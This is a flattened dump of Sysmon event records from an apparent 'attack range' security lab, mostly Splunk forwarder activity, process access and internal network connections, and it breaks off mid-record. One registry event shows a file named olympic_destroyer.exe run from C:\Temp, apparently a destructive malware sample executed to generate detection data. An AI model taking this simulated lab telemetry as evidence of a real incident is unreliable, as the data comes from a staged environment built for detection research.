154100x8000000000000000217357Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-1279-6216-7704-000000003902}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:50.874{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7A46C949ADA5438F1E808DABADD6535,SHA256=27DB6DCFEE0A1E33440ECD76772FE3F1353C2415CB83B08AB901310ADEE928D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217386Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:50.415{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5BA671BE108368A6819E65FBE75637B2,SHA256=285FA41B9501C5B9C6E6A8735C9E14DF735ED0507CB290FEDEF789E2C8AB76DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217385Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:50.134{4F8D34B0-1279-6216-7804-000000003902}36603472C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217384Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:50.072{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=466C277684167EBCB335E30C79A63EC3,SHA256=6746D4DB445DF25F9CDB96132E36FDCC9BAD103DECC7CA092DD099C202BDE7EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:51.905{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1FBEAD81878C02C3F8323B916692C83,SHA256=D56882C2489F888540ED05F94C3B9906657763198BA55E05C2DF68907EAA18BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217400Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-127B-6216-7904-000000003902}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217399Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217398Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217397Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217396Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217395Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217394Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217393Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217392Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217391Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217390Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-127B-6216-7904-000000003902}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217389Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.384{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-127B-6216-7904-000000003902}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217388Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.385{4F8D34B0-127B-6216-7904-000000003902}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217387Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:51.306{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1CAD37A305EBAB285411CF417FA5D00,SHA256=8C21D4F8F5DC918A0393860B16F26697AB2B2DB8F076688ABD330FDED399CC53,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000289460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localInvDBSetValue2022-02-23 10:54:51.689{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\olympic_destroyer.exeBinary Data 23542300x8000000000000000289462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:52.935{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3146AD58CD6D9C014F2E6DC037274AD6,SHA256=C3C0FBCE2E1B0E647FCB6190D36B16CB88E7F8A5D7B4F7BB45F311EED11CD340,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217402Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:52.446{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D8F341255C0D878CF67D55A70820831,SHA256=1B2FA5C781B91636173D2ECCD174846E01B7EC1E468DA980BD2B91A56A863086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217401Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:52.321{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D49405B3EB51FE7910018968832BED,SHA256=7EBF27D569A24BCC98245685FB9A11C6EA218417357BB45F9FD78334AB30C0F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:53.955{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=028C6B311F3F92380051CE7C2B8A304B,SHA256=C3DE67B7E65E7928931C6F5B2CBCE200B5DF9AE7543EF08E1A224C0AE03ECD2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217404Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:50.688{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51389-false10.0.1.12-8000- 23542300x8000000000000000217403Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:53.352{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E042DAA58059C74EC041A4A0EEDAEB3,SHA256=8B3E7DFEBAC78C0B4052D6B44599B63D650E579CB309B1F3C9F4BFCD91FEDAC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:53.319{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:53.319{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:53.319{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000289463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:50.694{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53536-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:54.976{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3B966AD12FEDE62799BD7857F14DC3B,SHA256=450464378A1B2B96DEE353316CEE1F5EA6C97FB362AB6270CDAB61B6A688C9F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217405Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:54.368{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4C91F8AA3990CB0F5B9EFE675B69147,SHA256=64860A0D1FE24919CF6D60A160C4CDB3EDEBC1932ACFB4F57A4BC1E9DF33EE63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:55.977{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63C1B72B72A8397F2F5A02B6F5750F38,SHA256=8129F826866992CDC5E9693B046439B4156A54818E71B6496CF3A34FB9758A9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217406Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:55.430{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 